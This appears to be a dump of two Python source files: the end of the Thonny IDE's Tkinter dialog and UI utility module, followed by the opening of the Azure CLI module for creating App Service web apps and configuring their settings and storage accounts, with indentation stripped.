initial_choice_index=None,
) -> None:
super().__init__(master=master)
self.title(title)
self.resizable(False, False)
self.main_frame.columnconfigure(0, weight=1)
row = 0
question_label = ttk.Label(self.main_frame, text=question)
question_label.grid(row=row, column=0, columnspan=2, sticky="w", padx=20, pady=20)
row += 1
self.var = tk.StringVar("")
if initial_choice_index is not None:
self.var.set(choices[initial_choice_index])
for choice in choices:
rb = ttk.Radiobutton(self.main_frame, text=choice, variable=self.var, value=choice)
rb.grid(row=row, column=0, columnspan=2, sticky="w", padx=20)
row += 1
ok_button = ttk.Button(self.main_frame, text="OK", command=self._ok, default="active")
ok_button.grid(row=row, column=0, sticky="e", pady=20)
cancel_button = ttk.Button(self.main_frame, text="Cancel", command=self._cancel)
cancel_button.grid(row=row, column=1, sticky="e", padx=20, pady=20)
self.bind("<Escape>", self._cancel, True)
self.bind("<Return>", self._ok, True)
self.protocol("WM_DELETE_WINDOW", self._cancel)
def _ok(self):
self.result = self.var.get()
if not self.result:
self.result = None
self.destroy()
def _cancel(self):
self.result = None
self.destroy()
class LongTextDialog(CommonDialog):
def __init__(self, title, text_content, parent=None):
if parent is None:
parent = tk._default_root
super().__init__(master=parent)
self.title(title)
main_frame = ttk.Frame(self)
main_frame.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
default_font = tk.font.nametofont("TkDefaultFont")
self._text = tktextext.TextFrame(
main_frame,
read_only=True,
wrap="none",
font=default_font,
width=80,
height=10,
relief="sunken",
borderwidth=1,
)
self._text.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=20, pady=20)
self._text.text.direct_insert("1.0", text_content)
self._text.text.see("1.0")
copy_button = ttk.Button(
main_frame, command=self._copy, text=tr("Copy to clipboard"), width=20
)
copy_button.grid(row=2, column=0, sticky="w", padx=20, pady=(0, 20))
close_button = ttk.Button(
main_frame, command=self._close, text=tr("Close"), default="active"
)
close_button.grid(row=2, column=1, sticky="w", padx=20, pady=(0, 20))
close_button.focus_set()
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self.protocol("WM_DELETE_WINDOW", self._close)
self.bind("<Escape>", self._close, True)
def _copy(self, event=None):
self.clipboard_clear()
self.clipboard_append(self._text.text.get("1.0", "end"))
def _close(self, event=None):
self.destroy()
def ask_one_from_choices(
master=None,
title="Choose one",
question: str = "Choose one:",
choices=[],
initial_choice_index=None,
):
dlg = ChoiceDialog(master, title, question, choices, initial_choice_index)
show_dialog(dlg, master)
return dlg.result
class SubprocessDialog(CommonDialog):
"""Shows incrementally the output of given subprocess.
Allows cancelling"""
def __init__(
self, master, proc, title, long_description=None, autoclose=True, conclusion="Done."
):
self._closed = False
self._proc = proc
self.stdout = ""
self.stderr = ""
self._stdout_thread = None
self._stderr_thread = None
self.returncode = None
self.cancelled = False
self._autoclose = autoclose
self._event_queue = collections.deque()
self._conclusion = conclusion
super().__init__(master)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(sticky="nsew")
text_font = tk.font.nametofont("TkFixedFont").copy()
text_font["size"] = int(text_font["size"] * 0.9)
text_font["family"] = "Courier" if running_on_mac_os() else "Courier New"
text_frame = tktextext.TextFrame(
main_frame,
read_only=True,
horizontal_scrollbar=False,
background=lookup_style_option("TFrame", "background"),
font=text_font,
wrap="word",
)
text_frame.grid(row=0, column=0, sticky=tk.NSEW, padx=15, pady=15)
self.text = text_frame.text
self.text["width"] = 60
self.text["height"] = 7
if long_description is not None:
self.text.direct_insert("1.0", long_description + "\n\n")
self.button = ttk.Button(main_frame, text=tr("Cancel"), command=self._close)
self.button.grid(row=1, column=0, pady=(0, 15))
main_frame.rowconfigure(0, weight=1)
main_frame.columnconfigure(0, weight=1)
self.title(title)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
# self.resizable(height=tk.FALSE, width=tk.FALSE)
self.text.focus_set()
self.bind(
"<Escape>", self._close_if_done, True
) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._close)
self.update_idletasks()
self._start_listening()
def _start_listening(self):
def listen_stream(stream_name):
stream = getattr(self._proc, stream_name)
while True:
data = stream.readline()
self._event_queue.append((stream_name, data))
setattr(self, stream_name, getattr(self, stream_name) + data)
if data == "":
break
self.returncode = self._proc.wait()
self._stdout_thread = threading.Thread(target=listen_stream, args=["stdout"], daemon=True)
self._stdout_thread.start()
if self._proc.stderr is not None:
self._stderr_thread = threading.Thread(
target=listen_stream, args=["stderr"], daemon=True
)
self._stderr_thread.start()
def poll_output_events():
if self._closed:
return
while len(self._event_queue) > 0:
stream_name, data = self._event_queue.popleft()
self.text.direct_insert("end", data, tags=(stream_name,))
self.text.see("end")
self.returncode = self._proc.poll()
if self.returncode == None:
self.after(200, poll_output_events)
else:
self.button["text"] = tr("OK")
self.button.focus_set()
if self.returncode != 0:
self.text.direct_insert(
"end",
"\n\nProcess failed, return code: %s\n" % self.returncode,
("stderr",),
)
self.update_idletasks()
self.text.see("end")
elif self._autoclose:
self._close()
else:
self.text.direct_insert("end", "\n\n" + self._conclusion)
self.update_idletasks()
self.text.see("end")
poll_output_events()
def _close_if_done(self, event):
if self._proc.poll() is not None:
self._close(event)
def _close(self, event=None):
if self._proc.poll() is None:
if messagebox.askyesno(
tr("Cancel the process?"),
tr("The process is still running.\nAre you sure you want to cancel?"),
parent=None if running_on_mac_os() else self,
):
# try gently first
try:
if running_on_windows():
os.kill(
self._proc.pid, signal.CTRL_BREAK_EVENT # pylint: disable=no-member
)
else:
os.kill(self._proc.pid, signal.SIGINT)
self._proc.wait(2)
except subprocess.TimeoutExpired:
if self._proc.poll() is None:
# now let's be more concrete
self._proc.kill()
self.cancelled = True
# Wait for threads to finish
self._stdout_thread.join(2)
if self._stderr_thread is not None:
self._stderr_thread.join(2)
# fetch output about cancelling
while len(self._event_queue) > 0:
stream_name, data = self._event_queue.popleft()
self.text.direct_insert("end", data, tags=(stream_name,))
self.text.direct_insert("end", "\n\nPROCESS CANCELLED")
self.text.see("end")
else:
return
else:
self._closed = True
self.destroy()
def get_busy_cursor():
if running_on_windows():
return "wait"
elif running_on_mac_os():
return "spinning"
else:
return "watch"
def get_tk_version_str():
return tk._default_root.tk.call("info", "patchlevel")
def get_tk_version_info():
result = []
for part in get_tk_version_str().split("."):
try:
result.append(int(part))
except Exception:
result.append(0)
return tuple(result)
def get_style_configuration(style_name, default={}):
style = ttk.Style()
# NB! style.configure seems to reuse the returned dict
# Don't change it without copying first
result = style.configure(style_name)
if result is None:
return default
else:
return result
def lookup_style_option(style_name, option_name, default=None):
style = ttk.Style()
setting = style.lookup(style_name, option_name)
if setting in [None, ""]:
return default
elif setting == "True":
return True
elif setting == "False":
return False
else:
return setting
def scale(value):
return get_workbench().scale(value)
def open_path_in_system_file_manager(path):
if running_on_mac_os():
# http://stackoverflow.com/a/3520693/261181
# -R doesn't allow showing hidden folders
subprocess.Popen(["open", path])
elif running_on_linux():
subprocess.Popen(["xdg-open", path])
else:
assert running_on_windows()
subprocess.Popen(["explorer", path])
def _get_dialog_provider():
if platform.system() != "Linux":
return filedialog
import shutil
if shutil.which("zenity"):
return _ZenityDialogProvider
# fallback
return filedialog
def asksaveasfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getSaveFile.htm
_tweak_file_dialog_parent(options)
return _get_dialog_provider().asksaveasfilename(**options)
def askopenfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_tweak_file_dialog_parent(options)
return _get_dialog_provider().askopenfilename(**options)
def askopenfilenames(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_tweak_file_dialog_parent(options)
return _get_dialog_provider().askopenfilenames(**options)
def askdirectory(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/chooseDirectory.htm
_tweak_file_dialog_parent(options)
return _get_dialog_provider().askdirectory(**options)
def _tweak_file_dialog_parent(options):
if running_on_mac_os():
# used to require master/parent (https://bugs.python.org/issue34927)
# but this is deprecated in Catalina (https://github.com/thonny/thonny/issues/840)
if "master" in options:
del options["master"]
if "parent" in options:
del options["parent"]
else:
if "parent" not in options:
if "master" in options:
options["parent"] = options["master"]
else:
options["parent"] = tk._default_root
class _ZenityDialogProvider:
# https://www.writebash.com/bash-gui/zenity-create-file-selection-dialog-224.html
# http://linux.byexamples.com/archives/259/a-complete-zenity-dialog-examples-1/
# http://linux.byexamples.com/archives/265/a-complete-zenity-dialog-examples-2/
# another possibility is to use PyGobject: https://github.com/poulp/zenipy
@classmethod
def askopenfilename(cls, **options):
args = cls._convert_common_options("Open file", **options)
return cls._call(args)
@classmethod
def askopenfilenames(cls, **options):
args = cls._convert_common_options("Open files", **options)
return cls._call(args + ["--multiple"]).split("|")
@classmethod
def asksaveasfilename(cls, **options):
args = cls._convert_common_options("Save as", **options)
args.append("--save")
if options.get("confirmoverwrite", True):
args.append("--confirm-overwrite")
filename = cls._call(args)
if not filename:
return None
if "defaultextension" in options and "." not in os.path.basename(filename):
filename += options["defaultextension"]
return filename
@classmethod
def askdirectory(cls, **options):
args = cls._convert_common_options("Select directory", **options)
args.append("--directory")
return cls._call(args)
@classmethod
def _convert_common_options(cls, default_title, **options):
args = ["--file-selection", "--title=%s" % options.get("title", default_title)]
filename = _options_to_zenity_filename(options)
if filename:
args.append("--filename=%s" % filename)
parent = options.get("parent", options.get("master", None))
if parent is not None:
args.append("--modal")
args.append("--attach=%s" % hex(parent.winfo_id()))
for desc, pattern in options.get("filetypes", ()):
# zenity requires star before extension
pattern = pattern.replace(" .", " *.")
if pattern.startswith("."):
pattern = "*" + pattern
if pattern == "*.*":
# ".*" was provided to make the pattern safe for Tk dialog
# not required with Zenity
pattern = "*"
args.append("--file-filter=%s | %s" % (desc, pattern))
return args
@classmethod
def _call(cls, args):
args = ["zenity", "--name=Thonny", "--class=Thonny"] + args
result = subprocess.run(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
if result.returncode == 0:
return result.stdout.strip()
else:
# could check stderr, but it may contain irrelevant warnings
return None
def _options_to_zenity_filename(options):
if options.get("initialdir"):
if options.get("initialfile"):
return os.path.join(options["initialdir"], options["initialfile"])
else:
return options["initialdir"] + os.path.sep
return None
def register_latin_shortcut(
registry, sequence: str, handler: Callable, tester: Optional[Callable]
) -> None:
res = sequence_to_event_state_and_keycode(sequence)
if res is not None:
if res not in registry:
registry[res] = []
registry[res].append((handler, tester))
def handle_mistreated_latin_shortcuts(registry, event):
# tries to handle Ctrl+LatinLetter shortcuts
# given from non-Latin keyboards
# See: https://bitbucket.org/plas/thonny/issues/422/edit-keyboard-shortcuts-ctrl-c-ctrl-v-etc
# only consider events with Control held
if not event.state & 0x04:
return
if running_on_mac_os():
return
# consider only part of the state,
# because at least on Windows, Ctrl-shortcuts' state
# has something extra
simplified_state = 0x04
if shift_is_pressed(event.state):
simplified_state |= 0x01
# print(simplified_state, event.keycode)
if (simplified_state, event.keycode) in registry:
if event.keycode != ord(event.char) and event.keysym in (None, "??"):
# keycode and char doesn't match,
# this means non-latin keyboard
for handler, tester in registry[(simplified_state, event.keycode)]:
if tester is None or tester():
handler()
def show_dialog(dlg, master=None, geometry=True, min_left=0, min_top=0):
if getattr(dlg, "closed", False):
return
if master is None:
master = tk._default_root
get_workbench().event_generate("WindowFocusOut")
# following order seems to give most smooth appearance
focused_widget = master.focus_get()
dlg.transient(master.winfo_toplevel())
if geometry:
# dlg.withdraw() # unfortunately inhibits size calculations in assign_geometry
if isinstance(geometry, str):
dlg.geometry(geometry)
else:
assign_geometry(dlg, master, min_left, min_top)
# dlg.wm_deiconify()
try:
dlg.grab_set()
except TclError:
pass
dlg.lift()
dlg.focus_set()
master.winfo_toplevel().wait_window(dlg)
dlg.grab_release()
master.winfo_toplevel().lift()
master.winfo_toplevel().focus_force()
master.winfo_toplevel().grab_set()
if running_on_mac_os():
master.winfo_toplevel().grab_release()
if focused_widget is not None:
try:
focused_widget.focus_force()
except TclError:
pass
def popen_with_ui_thread_callback(*Popen_args, on_completion, poll_delay=0.1, **Popen_kwargs):
if "encoding" not in Popen_kwargs:
if "env" not in Popen_kwargs:
Popen_kwargs["env"] = os.environ.copy()
Popen_kwargs["env"]["PYTHONIOENCODING"] = "utf-8"
if sys.version_info >= (3, 6):
Popen_kwargs["encoding"] = "utf-8"
proc = subprocess.Popen(*Popen_args, **Popen_kwargs)
# Need to read in thread in order to avoid blocking because
# of full pipe buffer (see https://bugs.python.org/issue1256)
out_lines = []
err_lines = []
def read_stream(stream, target_list):
while True:
line = stream.readline()
if line:
target_list.append(line)
else:
break
t_out = threading.Thread(target=read_stream, daemon=True, args=(proc.stdout, out_lines))
t_err = threading.Thread(target=read_stream, daemon=True, args=(proc.stderr, err_lines))
t_out.start()
t_err.start()
def poll():
if proc.poll() is not None:
t_out.join(3)
t_err.join(3)
on_completion(proc, out_lines, err_lines)
return
tk._default_root.after(int(poll_delay * 1000), poll)
poll()
return proc
class MenuEx(tk.Menu):
def __init__(self, target):
self._testers = {}
super().__init__(
target, tearoff=False, postcommand=self.on_post, **get_style_configuration("Menu")
)
def on_post(self, *args):
self.update_item_availability()
def update_item_availability(self):
for i in range(self.index("end") + 1):
item_data = self.entryconfigure(i)
if "label" in item_data:
tester = self._testers.get(item_data["label"])
if tester and not tester():
self.entryconfigure(i, state=tk.DISABLED)
else:
self.entryconfigure(i, state=tk.NORMAL)
def add(self, itemType, cnf={}, **kw):
cnf = cnf or kw
tester = cnf.get("tester")
if "tester" in cnf:
del cnf["tester"]
super().add(itemType, cnf)
itemdata = self.entryconfigure(self.index("end"))
labeldata = itemdata.get("label")
if labeldata:
self._testers[labeldata] = tester
class TextMenu(MenuEx):
def __init__(self, target):
self.text = target
MenuEx.__init__(self, target)
self.add_basic_items()
self.add_extra_items()
def add_basic_items(self):
self.add_command(label=tr("Cut"), command=self.on_cut, tester=self.can_cut)
self.add_command(label=tr("Copy"), command=self.on_copy, tester=self.can_copy)
self.add_command(label=tr("Paste"), command=self.on_paste, tester=self.can_paste)
def add_extra_items(self):
self.add_separator()
self.add_command(label=tr("Select All"), command=self.on_select_all)
def on_cut(self):
self.text.event_generate("<<Cut>>")
def on_copy(self):
self.text.event_generate("<<Copy>>")
def on_paste(self):
self.text.event_generate("<<Paste>>")
def on_select_all(self):
self.text.event_generate("<<SelectAll>>")
def can_cut(self):
return self.get_selected_text() and not self.selection_is_read_only()
def can_copy(self):
return self.get_selected_text()
def can_paste(self):
return not self.selection_is_read_only()
def get_selected_text(self):
try:
return self.text.get("sel.first", "sel.last")
except TclError:
return ""
def selection_is_read_only(self):
if hasattr(self.text, "is_read_only"):
return self.text.is_read_only()
return False
def create_url_label(master, url, text=None):
import webbrowser
url_font = tkinter.font.nametofont("TkDefaultFont").copy()
url_font.configure(underline=1)
url_label = ttk.Label(
master, text=text if text else url, style="Url.TLabel", cursor="hand2", font=url_font
)
url_label.grid()
url_label.bind("<Button-1>", lambda _: webbrowser.open(url))
return url_label
def get_size_option_name(window):
return "layout." + type(window).__name__ + "_size"
def get_default_theme():
if running_on_windows():
return "Windows"
elif running_on_rpi():
return "Raspberry Pi"
else:
return "Enhanced Clam"
def get_default_basic_theme():
if running_on_windows():
return "xpnative"
else:
return "clam"
EM_WIDTH = None
def ems_to_pixels(x):
global EM_WIDTH
if EM_WIDTH is None:
EM_WIDTH = tkinter.font.nametofont("TkDefaultFont").measure("m")
return int(EM_WIDTH * x)
_btn_padding = None
def tr_btn(s):
"""Translates button caption, adds padding to make sure text fits"""
global _btn_padding
if _btn_padding is None:
_btn_padding = get_button_padding()
return _btn_padding + tr(s) + _btn_padding
if __name__ == "__main__":
root = tk.Tk()
var = EnhancedIntVar(value=2)
print(var.get())
var.set(3)
print(repr(var.get()))
root.mainloop()
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import threading
import time
import ast
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError,
CLIInternalError, UnclassifiedUserFault, AzureResponseError,
ArgumentUsageError, MutuallyExclusiveArgumentError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_name,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH)
from ._github_oauth import (get_github_access_token)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add a new setting(s) or remove an existing setting(s)
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
